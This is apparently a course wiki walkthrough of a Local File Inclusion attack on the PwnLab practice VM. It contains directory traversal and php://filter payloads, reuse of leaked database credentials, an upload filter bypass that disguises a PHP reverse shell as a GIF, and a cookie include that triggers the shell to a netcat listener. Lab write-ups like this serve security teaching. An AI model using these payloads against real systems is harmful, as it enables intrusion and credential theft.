Web Apps: LFI - Paiet/SEC-335 GitHub Wiki

• LFI (Local File Inclusion) (example VM: PwnLab)

  • Type of attack where the attacker uses a misconfigured web app to execute commands/read files on the target machine

  • Scanning/Enumeration

    • Run Nmap
    • Open PwnLab website in browser
      • Found 3 links
        • Home
        • Login
        • Upload
      • Possible LFI vulnerability
        • Directory traversal
          • Click on "Upload" button and find http://192.168.219.145/?page=upload
          • LFI maybe here???
            • http://192.168.219.145/?page=../../../../../../../etc/passwd%00
              • Classic directory traversal w/LFI
              • %00 chops off anything after
                • Useful when sites add file extensions
          • Click on "Login" button and find http://192.168.219.145/?page=login
          • LFI maybe here???
            • Try same techniques
          • Traditional LFI not working
    • Run Nikto
      • /config.php: PHP config file may contain database IDs and passwords
        • This looks promising
        • browse to /config.php
          • Blank page
          • View source
            • Blank! Where's the source?
            • Use php://filter to get source

http://192.168.219.145/?page=php://filter/convert.base64-encode/resource=index

• We find a base64 encoded string
  • Decrypt
    • echo ...jwvaHRtbD4= | base64 --decode
    • python -m base64 -d <<< ...jwvaHRtbD4=
    • Use Hackbar
    • Online decoder
• Has interesting code (A good LFI attack vector!)

  •     <?php
        //Multilingual. Not implemented yet.
        //setcookie("lang","en.lang.php");
        if (isset($_COOKIE['lang']))
        {
             include("lang/".$_COOKIE['lang']);
         }
    
    

  • We'll need this later

http://192.168.219.145/?page=php://filter/convert.base64-encode/resource=config

• Decode base64 string

• EUREKA!!! We have a username and password

• Try logging in to the site

  • Denied

• Try logging into the MySQL service

  • mysql -u root -p -h 192.168.219.145
  • Success!
    • show databases;
      • information_schema
      • Users
        • use Users;
        • show tables;
          • users
        • select * from users;
          • Found 3 users with base64 encoded passwords
          • Decode passwords
          • Save to file
  • Login to the PwnLab website
    • I'm now able to upload a file
      • This is good news for LFI attack
    • Upload php-reverse-shell.php
      • Looks like file upload is restricted to image files
      • We need to modify the php-reverse-shell to imitate a .gif
        • Add "GIF98" as the very first line in our php-reverse-shell
        • Change file extension to ".gif"
        • Upload modified php-reverse-shell.gif
        • Copy image location
    • Start netcat listner
      • nc -nlvp 9999
    • Use LFI cookie include to trigger reverse shell
      • Start TamperData
      • Click PwnLab "Home" button
      • Click "Tamper" when TamperData prompts you
      • Edit "Cookie" section
        • Delete cookie data
        • Add line

• lang=../../../../../../../var/www/html/upload/<image-location>.gif - Press "OK" + Check netcat listener + Welcome to SHELL! :)